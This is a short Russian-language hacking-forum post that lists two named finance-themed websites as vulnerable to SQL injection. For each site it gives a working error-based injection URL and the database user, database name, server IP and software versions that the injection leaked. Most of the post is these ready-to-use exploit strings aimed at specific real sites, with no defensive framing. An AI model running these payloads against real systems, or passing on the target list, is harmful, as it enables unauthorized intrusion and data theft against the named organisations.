18.05.2017, 16:51
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 40
Провел на форуме:
14926
Репутация:
17
|
|
Парочка сайтов с финансовой тематикой
Сайт: eltee.de
SQL Injection через GET, уязвимый параметр id, вывод в title
pc-linux-gnu:i686:dbo456679871@212.227.29.56:db456679871:5.1.73
эксплоит:
Код:
view-source:http://www.eltee.de/education_id.php?id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version_compile_os,0x3a,@@version_compile_machine,0x3a,user(),0x3a,database(),0x3a,@@version,0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
Сайт: businesstoday.lk
SQL Injection через GET, уязвимый параметр issue
5.5.52-cll:bttoday_bt:bttoday_btadmin@localhost:Linux:i686:/usr
эксплоит:
Код:
http://www.businesstoday.lk/bnb.php?bnbId=&issue=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version,0x3a,database(),0x3a,user(),0x3a,@@version_compile_os,0x3a,@@version_compile_machine,0x3a,@@basedir,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
|
|
|